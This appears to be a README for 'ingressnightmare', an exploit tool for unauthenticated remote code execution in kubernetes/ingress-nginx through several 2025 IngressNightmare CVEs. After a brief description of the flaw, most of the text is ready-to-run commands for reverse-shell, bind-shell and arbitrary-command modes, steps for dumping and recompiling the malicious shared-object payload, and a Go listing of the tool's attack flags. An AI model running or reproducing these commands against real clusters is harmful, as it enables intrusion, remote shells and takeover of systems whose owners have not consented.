# Ingress Nightmare CVE-2025-1907
## Description
This vulnerability allows remote attackers to execute arbitrary
code on affected installations of kubernetes/ingress-nginx.
Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of HTTP requests.
It is triggered by sending two requests. The first is a long buffered
request to the NGINX server in the same pod, which nginx caches
as a temporary file. The second is a request to the
admission validating webhook server, which makes the
admission webhook write a temporary nginx config containing
the `ssl_engine badso_location;` directive. The admission
webhook then runs `nginx -t` to check the config, which
triggers remote code execution in the context of the NGINX server.
## Exploitation
```bash
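# Usage examples for the ingressnightmare CLI.
# ${INGRESS} is the admission webhook URL (-i / --ingress-webhook-url) and
# ${UPLOADER} is the upload URL (-u / --upload-url); see the FlagGroups listing below.
# reverse shell
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER}
# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER}
# blind command execution
./ingressnightmare -m c -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER}
# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url
# same as
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
# for CVE-2025-1097 - auth-tls-match-cn injection,
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}
# for CVE-2025-1098 - mirror UID injection -- all available
# (flag name matches the "is-mirror-with-uid" definition in the FlagGroups listing)
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-with-uid
## Advanced usage
# Send only admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-with-uid ...
# Send only upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload
# dry run mode
## dry run to lookup payload so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run
# dump with > /tmp/evil.so
## dry run to lookup raw nginx admission
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-with-uid ...
## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'
## If you get an error like "Exec format error", the payload is not compatible with the target system.
## It may be caused by the target system being arm64 while the payload is x86_64.
## The libc version and kernel version may also cause this error.
## This exp works on a 5.10 kernel without libc.
## recompile c
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingressnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}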
```
### FlagGroups
The exploit has so many flags that I have grouped them into several groups.
```go
{
// Set Targets Groups
ExpCmd.Flags().StringVarP(&Opts.IngressWebhookUrl, "ingress-webhook-url", "i",
"https://ingress-nginx-controller-admission.ingress-nginx.svc.cluster.local:443",
"ingress webhook url")
ExpCmd.Flags().StringVarP(&Opts.UploadUrl, "upload-url", "u",
"http://ingress-nginx-controller.ingress-nginx.svc.cluster.local:80",
"upload url")
// This two value is default value, but you can set it to other value if you found uncommon ingress-nginx webhook url
}
{
// Set Exploit Method for which CVE
ExpCmd.Flags().BoolVarP(&Opts.IsAuthURL, "is-auth-url", "a", true, "CVE-2025-24514: using auth-url to attack (default)")
ExpCmd.Flags().BoolVarP(&Opts.IsAuthTLSMatchCN, "is-match-cn", "A", false, "CVE-2025-1097: using auth-tls-match-cn to attack (not default)")
ExpCmd.Flags().StringVarP(&Opts.AuthSecret, "auth-secret-name", "U", "", "if using auth-tls-match-cn, secret name is required, example: kube-system/cilium-ca")
ExpCmd.Flags().BoolVarP(&Opts.IsMirrorWithUID, "is-mirror-with-uid", "M", false, "CVE-2025-1098: using mirror with uid")
ExpCmd.MarkFlagsRequiredTogether("is-match-cn", "auth-secret-name")
}
{
// Set Exploit Mode for reverse shell / bind shell / command
// this is required group
ExpCmd.Flags().StringVarP(&Opts.Mode, "mode", "m", "", "mode reverse-shell(r)/bind-shell(b)/command(c)")
_ = ExpCmd.MarkFlagRequired("mode")
ExpCmd.Flags().IPVarP(&Opts.ReverseShellIp, "reverse-shell-ip", "r", defaultPodIp(), "reverse shell ip")
ExpCmd.Flags().Uint16VarP(&Opts.ReverseShellPort, "reverse-shell-port", "p", 0, "reverse shell port")
ExpCmd.Flags().Uint16VarP(&Opts.BindShellPort, "bind-shell-port", "b", 0, "bind shell port")
ExpCmd.Flags().StringVarP(&Opts.Command, "command", "c", "", "command")
ExpCmd.MarkFlagsRequiredTogether("reverse-shell-ip", "reverse-shell-port")
}
{
// Debug modes
ExpCmd.PersistentFlags().CountVarP(&Opts.Verbose, "verbose", "v", "verbose output") // debug is -v ; trace is -vv
ExpCmd.PersistentFlags().BoolVarP(&Opts.DryRun, "dry-run", "d", false, "dry run and dump payload") // dump payload only
}
{
// test Only Upload Thread / Only Admission Thread modes
ExpCmd.Flags().BoolVarP(&Opts.OnlyAdmission, "only-admission", "o", false, "only admission")
ExpCmd.Flags().StringVarP(&Opts.OnlyAdmissionFilePath, "only-admission-file", "f", "", "only admission file")
ExpCmd.Flags().BoolVarP(&Opts.OnlyUpload, "only-upload", "O", false, "only upload")
ExpCmd.MarkFlagsRequiredTogether("only-admission", "only-admission-file")
}
{
// Set guessed PID and FD ranges
ExpCmd.Flags().IntVarP(&Opts.PidRangeStart, "pid-range-start", "S", 5, "pid range start")
ExpCmd.Flags().IntVarP(&Opts.PidRangeEnd, "pid-range-end", "E", 40, "distance to pid range end")
ExpCmd.Flags().IntVarP(&Opts.FdRangeStart, "fd-range-start", "s", 3, "fd range start")
ExpCmd.Flags().IntVarP(&Opts.FdRangeEnd, "fd-range-end", "e", 26, "distance fd range end")
}
{
// Advanced Payload: custom so file or json template
ExpCmd.Flags().StringVar(&Opts.SoFile, "so", "",
"custom so file exploit, if u get Exec format error, "+
"please recompile the so file from c code. ps: execute `./ingressnightmare show-c` to get source code")
ExpCmd.Flags().StringVarP(&Opts.ValidateJsonTemplate, "validate-json-template", "t", "", " validate json template, using foobar as placeholder to filepath ")
}
```
https://github.com/user-attachments/assets/415d6b81-b907-4aaa-bd99-18640bd64b2b